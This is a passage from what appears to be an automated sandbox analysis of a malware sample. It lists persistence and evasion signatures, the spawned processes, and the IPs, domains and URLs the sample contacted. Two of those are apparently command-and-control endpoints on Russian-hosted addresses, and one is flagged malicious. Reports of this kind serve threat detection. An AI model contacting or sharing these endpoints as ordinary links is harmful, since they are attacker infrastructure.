131 Creates multiple autostart registry keys 29->131 133 Uses schtasks.exe or at.exe to add and modify task schedules 29->133 135 Tries to evade debugger and weak emulator (self modifying code) 29->135 39 schtasks.exe 29->39         started        41 schtasks.exe 29->41         started        137 Binary is likely a compiled AutoIt script file 32->137 139 Hides threads from debuggers 32->139 141 Potentially malicious time measurement code found 32->141 43 chrome.exe 32->43         started        file13 signatures14 process15 dnsIp16 109 Antivirus detection for dropped file 36->109 111 Detected unpacking (changes PE section rights) 36->111 113 Machine Learning detection for dropped file 36->113 115 4 other signatures 36->115 46 conhost.exe 39->46         started        48 conhost.exe 41->48         started        89 192.168.2.5, 443, 49703, 49705 unknown unknown 43->89 91 192.168.2.4 unknown unknown 43->91 93 2 other IPs or domains 43->93 50 chrome.exe 43->50         started        53 chrome.exe 43->53         started        55 chrome.exe 43->55         started        signatures17 process18 dnsIp19 79 www.google.com 142.250.184.228, 443, 49753 GOOGLEUS United States 50->79 81 play.google.com 142.250.186.110, 443, 49780, 49788 GOOGLEUS United States 50->81 83 5 other IPs or domains 50->83
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
147.45.47.155
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.26.5.15
 db-ip.com United States
13335 CLOUDFLARENETUS false
77.91.77.66
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
172.217.23.110
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
142.250.186.110
 play.google.com United States
15169 GOOGLEUS false
142.250.184.228
 www.google.com United States
15169 GOOGLEUS false
172.217.18.110
 www3.l.google.com United States
15169 GOOGLEUS false
216.58.206.46
 unknown United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.5

Contacted Domains

Name IP Active
youtube-ui.l.google.com 172.217.23.110 true
www3.l.google.com 172.217.18.110 true
play.google.com 142.250.186.110 true
ipinfo.io 34.117.186.192 true
www.google.com 142.250.184.228 true
db-ip.com 104.26.5.15 true
accounts.youtube.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/Kiru9gu/index.php false
    http://147.45.47.155/ku4Nor9/index.php true
      https://ipinfo.io/widget/demo/8.46.123.33 false
        https://play.google.com/log?format=json&hasfast=true&authuser=0 false
          https://www.youtube.com/account false
            https://www.google.com/favicon.ico false
              https://ipinfo.io/ false
                https://db-ip.com/demo/home.php?s=8.46.123.33 false